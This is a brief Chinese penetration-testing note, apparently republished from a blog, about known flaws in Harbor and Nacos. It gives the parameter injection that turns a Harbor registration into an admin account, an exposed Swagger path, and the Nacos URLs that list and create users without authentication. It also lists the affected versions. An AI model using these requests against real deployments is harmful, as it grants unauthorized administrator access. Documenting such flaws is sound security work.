nacos+harbor组合的渗透测试

harbor

未授权访问

在搜索框搜索即可获得仓库信息(有点敏感就不贴东西了)
nacos+harbor组合的渗透测试_第1张图片

Swagger-ui文档泄露

https://IP:端口/devcenter-api-2.0
nacos+harbor组合的渗透测试_第2张图片

接口未授权访问

使用Swagger-ui访问接口即可,总有未授权的

未授权新建管理员

注册账号,对注册信息进行抓包修改,在post数据后面添加”has_admin_role”:true
nacos+harbor组合的渗透测试_第3张图片

影响版本

Harbor 1.7.0版本至1.8.2版本

不受影响版

Harbor>= 1.7.6
Harbor>= 1.8.3

nacos

未授权新建管理员

  1. http://192.168.157.80/nacos/v1/auth/users?pageNo=1&pageSize=9
  2. http://192.168.157.80/nacos/v1/auth/users?username=test111&password=123456
    在这里插入图片描述
    nacos+harbor组合的渗透测试_第4张图片

nacos+harbor组合的渗透测试_第5张图片

你可能感兴趣的:(渗透测试,网络安全,渗透测试)